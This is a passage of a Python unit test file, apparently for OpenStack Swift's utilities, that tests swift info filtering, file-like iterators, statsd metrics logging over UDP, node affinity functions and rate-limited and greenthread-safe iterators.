utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum') self.assertIn('cap1', utils._swift_admin_info) self.assertIn('ac1_foo', utils._swift_admin_info['cap1']) self.assertEqual( utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar') self.assertIn('ac1_lorem', utils._swift_admin_info['cap1']) self.assertEqual( utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum') self.assertNotIn('swift', utils._swift_info) self.assertNotIn('cap1', utils._swift_info) def test_get_swift_admin_info(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info(admin=True) self.assertIn('admin', info) self.assertIn('admin_cap1', info['admin']) self.assertIn('ac1_foo', info['admin']['admin_cap1']) self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar') self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertIn('cap1', info) self.assertIn('cap1_foo', info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') def test_get_swift_admin_info_with_disallowed_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap3_foo': 'cap3_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info( admin=True, disallowed_sections=['cap1', 'cap3']) self.assertIn('admin', info) self.assertIn('admin_cap1', info['admin']) self.assertIn('ac1_foo', info['admin']['admin_cap1']) self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar') self.assertIn('disallowed_sections', info['admin']) self.assertIn('cap1', info['admin']['disallowed_sections']) self.assertNotIn('cap2', info['admin']['disallowed_sections']) self.assertIn('cap3', info['admin']['disallowed_sections']) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(info['swift']['foo'], 'bar') self.assertNotIn('cap1', info) self.assertIn('cap2', info) self.assertIn('cap2_foo', info['cap2']) self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar') self.assertNotIn('cap3', info) def test_get_swift_admin_info_with_disallowed_sub_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar', 'cap1_moo': 'cap1_baa'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap2_foo': 'cap2_bar'}, 'cap4': {'a': {'b': {'c': 'c'}, 'b.c': 'b.c'}}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info( admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3', 'cap4.a.b.c']) self.assertNotIn('cap3', info) self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa') self.assertNotIn('cap1_foo', info['cap1']) self.assertNotIn('c', info['cap4']['a']['b']) self.assertEqual(info['cap4']['a']['b.c'], 'b.c') def test_get_swift_info_with_unmatched_disallowed_sections(self): cap1 = {'cap1_foo': 'cap1_bar', 'cap1_moo': 'cap1_baa'} utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': cap1} # expect no exceptions info = utils.get_swift_info( disallowed_sections=['cap2.cap1_foo', 'cap1.no_match', 'cap1.cap1_foo.no_match.no_match']) self.assertEqual(info['cap1'], cap1) class TestFileLikeIter(unittest.TestCase): def test_iter_file_iter(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] for chunk in utils.FileLikeIter(in_iter): chunks.append(chunk) self.assertEqual(chunks, in_iter) def test_next(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] iter_file = utils.FileLikeIter(in_iter) while True: try: chunk = next(iter_file) except StopIteration: break chunks.append(chunk) self.assertEqual(chunks, in_iter) def test_read(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] iter_file = utils.FileLikeIter(in_iter) self.assertEqual(iter_file.read(), b''.join(in_iter)) def test_read_with_size(self): in_iter = [b'abc', b'de', b'fghijk', b'l'] chunks = [] iter_file = utils.FileLikeIter(in_iter) while True: chunk = iter_file.read(2) if not chunk: break self.assertTrue(len(chunk) <= 2) chunks.append(chunk) self.assertEqual(b''.join(chunks), b''.join(in_iter)) def test_read_with_size_zero(self): # makes little sense, but file supports it, so... self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'') def test_readline(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = [] iter_file = utils.FileLikeIter(in_iter) while True: line = iter_file.readline() if not line: break lines.append(line) self.assertEqual( lines, [v if v == b'trailing.' else v + b'\n' for v in b''.join(in_iter).split(b'\n')]) def test_readline2(self): self.assertEqual( utils.FileLikeIter([b'abc', b'def\n']).readline(4), b'abcd') def test_readline3(self): self.assertEqual( utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(), (b'a' * 1111) + b'bc\n') def test_readline_with_size(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = [] iter_file = utils.FileLikeIter(in_iter) while True: line = iter_file.readline(2) if not line: break lines.append(line) self.assertEqual( lines, [b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n', b'k\n', b'tr', b'ai', b'li', b'ng', b'.']) def test_readlines(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] lines = utils.FileLikeIter(in_iter).readlines() self.assertEqual( lines, [v if v == b'trailing.' else v + b'\n' for v in b''.join(in_iter).split(b'\n')]) def test_readlines_with_size(self): in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n', b'trailing.'] iter_file = utils.FileLikeIter(in_iter) lists_of_lines = [] while True: lines = iter_file.readlines(2) if not lines: break lists_of_lines.append(lines) self.assertEqual( lists_of_lines, [[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'], [b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'], [b'.']]) def test_close(self): iter_file = utils.FileLikeIter([b'a', b'b', b'c']) self.assertEqual(next(iter_file), b'a') iter_file.close() self.assertTrue(iter_file.closed) self.assertRaises(ValueError, iter_file.next) self.assertRaises(ValueError, iter_file.read) self.assertRaises(ValueError, iter_file.readline) self.assertRaises(ValueError, iter_file.readlines) # Just make sure repeated close calls don't raise an Exception iter_file.close() self.assertTrue(iter_file.closed) def test_get_hub(self): # This test mock the eventlet.green.select module without poll # as in eventlet > 0.20 # https://github.com/eventlet/eventlet/commit/614a20462 # We add __original_module_select to sys.modules to mock usage # of eventlet.patcher.original class SelectWithPoll(object): def poll(): pass class SelectWithoutPoll(object): pass # Platform with poll() that call get_hub before eventlet patching with mock.patch.dict('sys.modules', {'select': SelectWithPoll, '__original_module_select': SelectWithPoll}): self.assertEqual(utils.get_hub(), 'poll') # Platform with poll() that call get_hub after eventlet patching with mock.patch.dict('sys.modules', {'select': SelectWithoutPoll, '__original_module_select': SelectWithPoll}): self.assertEqual(utils.get_hub(), 'poll') # Platform without poll() -- before or after patching doesn't matter with mock.patch.dict('sys.modules', {'select': SelectWithoutPoll, '__original_module_select': SelectWithoutPoll}): self.assertEqual(utils.get_hub(), 'selects') class TestStatsdLogging(unittest.TestCase): def setUp(self): def fake_getaddrinfo(host, port, *args): # this is what a real getaddrinfo('localhost', port, # socket.AF_INET) returned once return [(socket.AF_INET, # address family socket.SOCK_STREAM, # socket type socket.IPPROTO_TCP, # socket protocol '', # canonical name, ('127.0.0.1', port)), # socket address (socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP, '', ('127.0.0.1', port))] self.real_getaddrinfo = utils.socket.getaddrinfo self.getaddrinfo_patcher = mock.patch.object( utils.socket, 'getaddrinfo', fake_getaddrinfo) self.mock_getaddrinfo = self.getaddrinfo_patcher.start() self.addCleanup(self.getaddrinfo_patcher.stop) def test_get_logger_statsd_client_not_specified(self): logger = utils.get_logger({}, 'some-name', log_route='some-route') # white-box construction validation self.assertIsNone(logger.logger.statsd_client) def test_get_logger_statsd_client_defaults(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}, 'some-name', log_route='some-route') # white-box construction validation self.assertTrue(isinstance(logger.logger.statsd_client, utils.StatsdClient)) self.assertEqual(logger.logger.statsd_client._host, 'some.host.com') self.assertEqual(logger.logger.statsd_client._port, 8125) self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.') self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1) logger.set_statsd_prefix('some-name.more-specific') self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.more-specific.') logger.set_statsd_prefix('') self.assertEqual(logger.logger.statsd_client._prefix, '') def test_get_logger_statsd_client_non_defaults(self): logger = utils.get_logger({ 'log_statsd_host': 'another.host.com', 'log_statsd_port': '9876', 'log_statsd_default_sample_rate': '0.75', 'log_statsd_sample_rate_factor': '0.81', 'log_statsd_metric_prefix': 'tomato.sauce', }, 'some-name', log_route='some-route') self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.some-name.') logger.set_statsd_prefix('some-name.more-specific') self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.some-name.more-specific.') logger.set_statsd_prefix('') self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.') self.assertEqual(logger.logger.statsd_client._host, 'another.host.com') self.assertEqual(logger.logger.statsd_client._port, 9876) self.assertEqual(logger.logger.statsd_client._default_sample_rate, 0.75) self.assertEqual(logger.logger.statsd_client._sample_rate_factor, 0.81) def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self): def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest): if family == socket.AF_INET: return [(socket.AF_INET, 'blah', 'blah', 'blah', ('127.0.0.1', int(port)))] elif family == socket.AF_INET6: # Implemented so an incorrectly ordered implementation (IPv6 # then IPv4) would realistically fail. return [(socket.AF_INET6, 'blah', 'blah', 'blah', ('::1', int(port), 0, 0))] with mock.patch.object(utils.socket, 'getaddrinfo', new=stub_getaddrinfo_both_ipv4_and_ipv6): logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET) self.assertEqual(statsd_client._target, ('localhost', 9876)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET) def test_ipv4_instantiation_and_socket_creation(self): logger = utils.get_logger({ 'log_statsd_host': '127.0.0.1', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET) self.assertEqual(statsd_client._target, ('127.0.0.1', 9876)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET) def test_ipv6_instantiation_and_socket_creation(self): # We have to check the given hostname or IP for IPv4/IPv6 on logger # instantiation so we don't call getaddrinfo() too often and don't have # to call bind() on our socket to detect IPv4/IPv6 on every send. # # This test uses the real getaddrinfo, so we patch over the mock to # put the real one back. If we just stop the mock, then # unittest.exit() blows up, but stacking real-fake-real works okay. with mock.patch.object(utils.socket, 'getaddrinfo', self.real_getaddrinfo): logger = utils.get_logger({ 'log_statsd_host': '::1', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET6) self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET6) def test_bad_hostname_instantiation(self): with mock.patch.object(utils.socket, 'getaddrinfo', side_effect=utils.socket.gaierror("whoops")): logger = utils.get_logger({ 'log_statsd_host': 'i-am-not-a-hostname-or-ip', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client self.assertEqual(statsd_client._sock_family, socket.AF_INET) self.assertEqual(statsd_client._target, ('i-am-not-a-hostname-or-ip', 9876)) got_sock = statsd_client._open_socket() self.assertEqual(got_sock.family, socket.AF_INET) # Maybe the DNS server gets fixed in a bit and it starts working... or # maybe the DNS record hadn't propagated yet. In any case, failed # statsd sends will warn in the logs until the DNS failure or invalid # IP address in the configuration is fixed. def test_sending_ipv6(self): def fake_getaddrinfo(host, port, *args): # this is what a real getaddrinfo('::1', port, # socket.AF_INET6) returned once return [(socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_TCP, '', ('::1', port, 0, 0)), (socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP, '', ('::1', port, 0, 0))] with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo): logger = utils.get_logger({ 'log_statsd_host': '::1', 'log_statsd_port': '9876', }, 'some-name', log_route='some-route') statsd_client = logger.logger.statsd_client fl = FakeLogger() statsd_client.logger = fl mock_socket = MockUdpSocket() statsd_client._open_socket = lambda *_: mock_socket logger.increment('tunafish') self.assertEqual(fl.get_lines_for_level('warning'), []) self.assertEqual(mock_socket.sent, [(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))]) def test_no_exception_when_cant_send_udp_packet(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}) statsd_client = logger.logger.statsd_client fl = FakeLogger() statsd_client.logger = fl mock_socket = MockUdpSocket(sendto_errno=errno.EPERM) statsd_client._open_socket = lambda *_: mock_socket logger.increment('tunafish') expected = ["Error sending UDP message to ('some.host.com', 8125): " "[Errno 1] test errno 1"] self.assertEqual(fl.get_lines_for_level('warning'), expected) def test_sample_rates(self): logger = utils.get_logger({'log_statsd_host': 'some.host.com'}) mock_socket = MockUdpSocket() # encapsulation? what's that? statsd_client = logger.logger.statsd_client self.assertTrue(statsd_client.random is random.random) statsd_client._open_socket = lambda *_: mock_socket statsd_client.random = lambda: 0.50001 logger.increment('tribbles', sample_rate=0.5) self.assertEqual(len(mock_socket.sent), 0) statsd_client.random = lambda: 0.49999 logger.increment('tribbles', sample_rate=0.5) self.assertEqual(len(mock_socket.sent), 1) payload = mock_socket.sent[0][0] self.assertTrue(payload.endswith(b"|@0.5")) def test_sample_rates_with_sample_rate_factor(self): logger = utils.get_logger({ 'log_statsd_host': 'some.host.com', 'log_statsd_default_sample_rate': '0.82', 'log_statsd_sample_rate_factor': '0.91', }) effective_sample_rate = 0.82 * 0.91 mock_socket = MockUdpSocket() # encapsulation? what's that? statsd_client = logger.logger.statsd_client self.assertTrue(statsd_client.random is random.random) statsd_client._open_socket = lambda *_: mock_socket statsd_client.random = lambda: effective_sample_rate + 0.001 logger.increment('tribbles') self.assertEqual(len(mock_socket.sent), 0) statsd_client.random = lambda: effective_sample_rate - 0.001 logger.increment('tribbles') self.assertEqual(len(mock_socket.sent), 1) payload = mock_socket.sent[0][0] suffix = "|@%s" % effective_sample_rate if six.PY3: suffix = suffix.encode('utf-8') self.assertTrue(payload.endswith(suffix), payload) effective_sample_rate = 0.587 * 0.91 statsd_client.random = lambda: effective_sample_rate - 0.001 logger.increment('tribbles', sample_rate=0.587) self.assertEqual(len(mock_socket.sent), 2) payload = mock_socket.sent[1][0] suffix = "|@%s" % effective_sample_rate if six.PY3: suffix = suffix.encode('utf-8') self.assertTrue(payload.endswith(suffix), payload) def test_timing_stats(self): class MockController(object): def __init__(self, status): self.status = status self.logger = self self.args = () self.called = 'UNKNOWN' def timing_since(self, *args): self.called = 'timing' self.args = args @utils.timing_stats() def METHOD(controller): return Response(status=controller.status) mock_controller = MockController(200) METHOD(mock_controller) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(400) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(404) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(412) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(416) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(500) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing') self.assertTrue(mock_controller.args[1] > 0) mock_controller = MockController(507) METHOD(mock_controller) self.assertEqual(len(mock_controller.args), 2) self.assertEqual(mock_controller.called, 'timing') self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing') self.assertTrue(mock_controller.args[1] > 0) class UnsafeXrange(object): """ Like range(limit), but with extra context switching to screw things up. """ def __init__(self, upper_bound): self.current = 0 self.concurrent_calls = 0 self.upper_bound = upper_bound self.concurrent_call = False def __iter__(self): return self def next(self): if self.concurrent_calls > 0: self.concurrent_call = True self.concurrent_calls += 1 try: if self.current >= self.upper_bound: raise StopIteration else: val = self.current self.current += 1 eventlet.sleep() # yield control return val finally: self.concurrent_calls -= 1 __next__ = next class TestAffinityKeyFunction(unittest.TestCase): def setUp(self): self.nodes = [dict(id=0, region=1, zone=1), dict(id=1, region=1, zone=2), dict(id=2, region=2, zone=1), dict(id=3, region=2, zone=2), dict(id=4, region=3, zone=1), dict(id=5, region=3, zone=2), dict(id=6, region=4, zone=0), dict(id=7, region=4, zone=1)] def test_single_region(self): keyfn = utils.affinity_key_function("r3=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids) def test_bogus_value(self): self.assertRaises(ValueError, utils.affinity_key_function, "r3") self.assertRaises(ValueError, utils.affinity_key_function, "r3=elephant") def test_empty_value(self): # Empty's okay, it just means no preference keyfn = utils.affinity_key_function("") self.assertTrue(callable(keyfn)) ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids) def test_all_whitespace_value(self): # Empty's okay, it just means no preference keyfn = utils.affinity_key_function(" \n") self.assertTrue(callable(keyfn)) ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids) def test_with_zone_zero(self): keyfn = utils.affinity_key_function("r4z0=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids) def test_multiple(self): keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids) def test_more_specific_after_less_specific(self): keyfn = utils.affinity_key_function("r2=100, r2z2=50") ids = [n['id'] for n in sorted(self.nodes, key=keyfn)] self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids) class TestAffinityLocalityPredicate(unittest.TestCase): def setUp(self): self.nodes = [dict(id=0, region=1, zone=1), dict(id=1, region=1, zone=2), dict(id=2, region=2, zone=1), dict(id=3, region=2, zone=2), dict(id=4, region=3, zone=1), dict(id=5, region=3, zone=2), dict(id=6, region=4, zone=0), dict(id=7, region=4, zone=1)] def test_empty(self): pred = utils.affinity_locality_predicate('') self.assertTrue(pred is None) def test_region(self): pred = utils.affinity_locality_predicate('r1') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0, 1], ids) def test_zone(self): pred = utils.affinity_locality_predicate('r1z1') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0], ids) def test_multiple(self): pred = utils.affinity_locality_predicate('r1, r3, r4z0') self.assertTrue(callable(pred)) ids = [n['id'] for n in self.nodes if pred(n)] self.assertEqual([0, 1, 4, 5, 6], ids) def test_invalid(self): self.assertRaises(ValueError, utils.affinity_locality_predicate, 'falafel') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r8zQ') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r2d2') self.assertRaises(ValueError, utils.affinity_locality_predicate, 'r1z1=1') class TestRateLimitedIterator(unittest.TestCase): def run_under_pseudo_time( self, func, *args, **kwargs): curr_time = [42.0] def my_time(): curr_time[0] += 0.001 return curr_time[0] def my_sleep(duration): curr_time[0] += 0.001 curr_time[0] += duration with patch('time.time', my_time), \ patch('eventlet.sleep', my_sleep): return func(*args, **kwargs) def test_rate_limiting(self): def testfunc(): limited_iterator = utils.RateLimitedIterator(range(9999), 100) got = [] started_at = time.time() try: while time.time() - started_at < 0.1: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # it's 11, not 10, because ratelimiting doesn't apply to the very # first element. self.assertEqual(len(got), 11) def test_rate_limiting_sometimes(self): def testfunc(): limited_iterator = utils.RateLimitedIterator( range(9999), 100, ratelimit_if=lambda item: item % 23 != 0) got = [] started_at = time.time() try: while time.time() - started_at < 0.5: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # we'd get 51 without the ratelimit_if, but because 0, 23 and 46 # weren't subject to ratelimiting, we get 54 instead self.assertEqual(len(got), 54) def test_limit_after(self): def testfunc(): limited_iterator = utils.RateLimitedIterator( range(9999), 100, limit_after=5) got = [] started_at = time.time() try: while time.time() - started_at < 0.1: got.append(next(limited_iterator)) except StopIteration: pass return got got = self.run_under_pseudo_time(testfunc) # it's 16, not 15, because ratelimiting doesn't apply to the very # first element. self.assertEqual(len(got), 16) class TestGreenthreadSafeIterator(unittest.TestCase): def increment(self, iterable): plus_ones = [] for n in iterable: plus_ones.append(n + 1) return plus_ones def test_setup_works(self): # it should work without concurrent access self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4))) iterable = UnsafeXrange(10) pile = eventlet.GreenPile(2) for _ in range(2): pile.spawn(self.increment, iterable) sorted([resp for resp in pile]) self.assertTrue( iterable.concurrent_call, 'test setup is insufficiently crazy') def test_access_is_serialized(self): pile = eventlet.GreenPile(2) unsafe_iterable = UnsafeXrange(10) iterable = utils.GreenthreadSafeIterator(unsafe_iterable) for _ in range(2): pile.spawn(self.increment, iterable) response = sorted(sum([resp for resp in pile], [])) self.assertEqual(list(range(1, 11)), response) self.assertTrue( not unsafe_iterable.concurrent_call, 'concurrent call occurred') class TestStatsdLoggingDelegation(unittest.TestCase): def setUp(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind(('localhost', 0)) self.port = self.sock.getsockname()[1] self.queue = Queue() self.reader_thread = threading.Thread(target=self.statsd_reader) self.reader_thread.setDaemon(1) self.reader_thread.start() def tearDown(self): # The "no-op when disabled" test doesn't set up a real logger, so # create one here so we can tell the reader thread to stop. if not getattr(self, 'logger', None): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), }, 'some-name') self.logger.increment('STOP') self.reader_thread.join(timeout=4) self.sock.close() del self.logger def statsd_reader(self): while True: try: payload = self.sock.recv(4096) if payload and b'STOP' in payload: return 42 self.queue.put(payload) except Exception as e: sys.stderr.write('statsd_reader thread: %r' % (e,)) break def _send_and_get(self, sender_fn, *args, **kwargs): """ Because the client library may not actually send a packet with sample_rate < 1, we keep trying until we get one through. """ got = None while not got: sender_fn(*args, **kwargs) try: got = self.queue.get(timeout=0.5) except Empty: pass return got def assertStat(self, expected, sender_fn, *args, **kwargs): got = self._send_and_get(sender_fn, *args, **kwargs) if six.PY3: got = got.decode('utf-8') return self.assertEqual(expected, got) def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs): got = self._send_and_get(sender_fn, *args, **kwargs) if six.PY3: got = got.decode('utf-8') return self.assertTrue(re.search(expected_regexp, got), [got, expected_regexp]) def test_methods_are_no_ops_when_not_enabled(self): logger = utils.get_logger({ # No "log_statsd_host" means "disabled" 'log_statsd_port': str(self.port), }, 'some-name') # Delegate methods are no-ops self.assertIsNone(logger.update_stats('foo', 88)) self.assertIsNone(logger.update_stats('foo', 88, 0.57)) self.assertIsNone(logger.update_stats('foo', 88, sample_rate=0.61)) self.assertIsNone(logger.increment('foo')) self.assertIsNone(logger.increment('foo', 0.57)) self.assertIsNone(logger.increment('foo', sample_rate=0.61)) self.assertIsNone(logger.decrement('foo')) self.assertIsNone(logger.decrement('foo', 0.57)) self.assertIsNone(logger.decrement('foo', sample_rate=0.61)) self.assertIsNone(logger.timing('foo', 88.048)) self.assertIsNone(logger.timing('foo', 88.57, 0.34)) self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82)) self.assertIsNone(logger.timing_since('foo', 8938)) self.assertIsNone(logger.timing_since('foo', 8948, 0.57)) self.assertIsNone(logger.timing_since('foo', 849398, sample_rate=0.61)) # Now, the queue should be empty (no UDP packets sent) self.assertRaises(Empty, self.queue.get_nowait) def test_delegate_methods_with_no_default_sample_rate(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), }, 'some-name') self.assertStat('some-name.some.counter:1|c', self.logger.increment, 'some.counter') self.assertStat('some-name.some.counter:-1|c', self.logger.decrement, 'some.counter') self.assertStat('some-name.some.operation:4900.0|ms', self.logger.timing, 'some.operation', 4.9 * 1000) self.assertStatMatches(r'some-name\.another\.operation:\d+\.\d+\|ms', self.logger.timing_since, 'another.operation', time.time()) self.assertStat('some-name.another.counter:42|c', self.logger.update_stats, 'another.counter', 42) # Each call can override the sample_rate (also, bonus prefix test) self.logger.set_statsd_prefix('pfx') self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment, 'some.counter', sample_rate=0.972) self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement, 'some.counter', sample_rate=0.972) self.assertStat('pfx.some.operation:4900.0|ms|@0.972', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.972) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.972', self.logger.timing_since, 'another.op', time.time(), sample_rate=0.972) self.assertStat('pfx.another.counter:3|c|@0.972', self.logger.update_stats, 'another.counter', 3, sample_rate=0.972) # Can override sample_rate with non-keyword arg self.logger.set_statsd_prefix('') self.assertStat('some.counter:1|c|@0.939', self.logger.increment, 'some.counter', 0.939) self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement, 'some.counter', 0.939) self.assertStat('some.operation:4900.0|ms|@0.939', self.logger.timing, 'some.operation', 4.9 * 1000, 0.939) self.assertStatMatches(r'another\.op:\d+\.\d+\|ms|@0.939', self.logger.timing_since, 'another.op', time.time(), 0.939) self.assertStat('another.counter:3|c|@0.939', self.logger.update_stats, 'another.counter', 3, 0.939) def test_delegate_methods_with_default_sample_rate(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), 'log_statsd_default_sample_rate': '0.93', }, 'pfx') self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment, 'some.counter') self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement, 'some.counter') self.assertStat('pfx.some.operation:4760.0|ms|@0.93', self.logger.timing, 'some.operation', 4.76 * 1000) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.93', self.logger.timing_since, 'another.op', time.time()) self.assertStat('pfx.another.counter:3|c|@0.93', self.logger.update_stats, 'another.counter', 3) # Each call can override the sample_rate self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment, 'some.counter', sample_rate=0.9912) self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement, 'some.counter', sample_rate=0.9912) self.assertStat('pfx.some.operation:4900.0|ms|@0.9912', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.9912) self.assertStatMatches(r'pfx\.another\.op:\d+\.\d+\|ms|@0.9912', self.logger.timing_since, 'another.op', time.time(), sample_rate=0.9912) self.assertStat('pfx.another.counter:3|c|@0.9912', self.logger.update_stats, 'another.counter', 3, sample_rate=0.9912) # Can override sample_rate with non-keyword arg self.logger.set_statsd_prefix('') self.assertStat('some.counter:1|c|@0.987654', self.logger.increment, 'some.counter', 0.987654) self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement, 'some.counter', 0.987654) self.assertStat('some.operation:4900.0|ms|@0.987654', self.logger.timing, 'some.operation', 4.9 * 1000, 0.987654) self.assertStatMatches(r'another\.op:\d+\.\d+\|ms|@0.987654', self.logger.timing_since, 'another.op', time.time(), 0.987654) self.assertStat('another.counter:3|c|@0.987654', self.logger.update_stats, 'another.counter', 3, 0.987654) def test_delegate_methods_with_metric_prefix(self): self.logger = utils.get_logger({ 'log_statsd_host': 'localhost', 'log_statsd_port': str(self.port), 'log_statsd_metric_prefix': 'alpha.beta', }, 'pfx') self.assertStat('alpha.beta.pfx.some.counter:1|c', self.logger.increment, 'some.counter') self.assertStat('alpha.beta.pfx.some.counter:-1|c', self.logger.decrement, 'some.counter') self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms', self.logger.timing, 'some.operation', 4.76 * 1000) self.assertStatMatches( r'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms', self.logger.timing_since, 'another.op', time.time()) 